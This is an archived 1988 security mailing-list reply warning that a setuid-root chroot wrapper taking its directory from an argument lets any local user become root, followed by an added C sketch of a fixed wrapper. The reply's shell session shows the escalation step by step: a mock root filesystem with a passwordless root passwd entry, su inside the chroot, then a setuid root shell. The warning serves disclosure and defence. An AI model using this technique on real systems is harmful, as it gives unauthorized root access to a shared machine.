The 'Security Digest' Archives (TM)

ARCHIVE: 'Phage List' - Archives (1988 - 1989)
DOCUMENT: phage #305 [Re: revised tftpd writeup] (1 message, 729 bytes)
SOURCE: http://securitydigest.org/exec/display?f=phage/archive/305.txt&t=text/plain
NOTICE: securitydigest.org recognises the rights of all third-party works.

START OF DOCUMENT

From: "Lennart_Lovstrand.EuroPARC"@xerox.com
To: phage
Date: Fri 13:28:33 25/11/1988 EST
Subject: Re: revised tftpd writeup

> It's not necessary to hack tftpd at all.  Just write a small setuid root
> program called "chroot".  It chdir()s and chroot()s to its first argument,
> setuid()s to the invoker's real uid, and then exec()s the program given by
> the remaining arguments.

Please either don't make that program setuid root or hardwire the directory
you are chrooting to!

If you leave it as is, any user on your system can make themselves a setuid
root shell by creating a mock root file system as in the following example:

|  % pwd
|  /home/lovstrand/foo
|  % ls -R
|  bin	chroot	etc
| 
|  bin:
|  chmod	chown	sh	su
| 
|  etc:
|  passwd
|  % cat etc/passwd
|  root::0:0:
|  % ls -l bin/sh
|  -rwxr-xr-x  1 lovstran    57344 Nov 25 17:59 bin/sh
|  % chroot . bin/su
|  # chown root bin/sh
|  # chmod u+s root bin/sh
|  # ^D
|  % ls -l bin/sh
|  -rwsr-xr-x  1 root        57344 Nov 25 17:59 bin/sh

--Lennart <Lovstrand.EuroPARC@Xerox.COM>
Rank Xerox EuroPARC, 61 Regent Street, Cambridge CB2 1AB, England

END OF DOCUMENT
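
Added example, not part of the original message and not code from the list: a sketch of the fix the message asks for, a setuid-root wrapper whose jail directory is hardwired instead of taken from the first argument. The path /var/tftpjail is a placeholder, and the helper jail_is_trusted() with its ownership and permission check is an assumption added here.

```c
#define _DEFAULT_SOURCE            /* exposes chroot() on glibc */
#include <stdio.h>
#include <unistd.h>
#include <sys/types.h>
#include <sys/stat.h>

/* Assumption: placeholder jail path, fixed at build time, never from argv. */
#define JAIL_DIR "/var/tftpjail"

/* Added check (an assumption, not from the message): accept the jail only if
 * it is a directory owned by root that group and others cannot write to.
 * It covers the top-level directory only; bin/ and etc/ need the same care. */
int jail_is_trusted(const struct stat *st)
{
    return S_ISDIR(st->st_mode) && st->st_uid == 0 &&
           !(st->st_mode & (S_IWGRP | S_IWOTH));
}

int main(int argc, char **argv)
{
    struct stat st;

    if (argc < 2) {
        fprintf(stderr, "usage: %s program [args...]\n", argv[0]);
        return 2;
    }
    /* The caller chooses the program, not the root directory. */
    if (chdir(JAIL_DIR) != 0 || stat(".", &st) != 0) {
        perror(JAIL_DIR);
        return 1;
    }
    if (!jail_is_trusted(&st)) {
        fprintf(stderr, "%s: must be root-owned and not group/other-writable\n",
                JAIL_DIR);
        return 1;
    }
    if (chroot(".") != 0 || chdir("/") != 0) {
        perror("chroot");
        return 1;
    }
    /* Drop to the invoker's real ids before exec, and verify each call. */
    if (setgid(getgid()) != 0 || setuid(getuid()) != 0) {
        perror("drop privileges");
        return 1;
    }
    execv(argv[1], argv + 1);
    perror(argv[1]);
    return 1;
}
```

With the directory fixed and its ownership checked, the files the jailed program sees as /etc/passwd and /bin/su are the administrator's, not ones supplied by the invoking user.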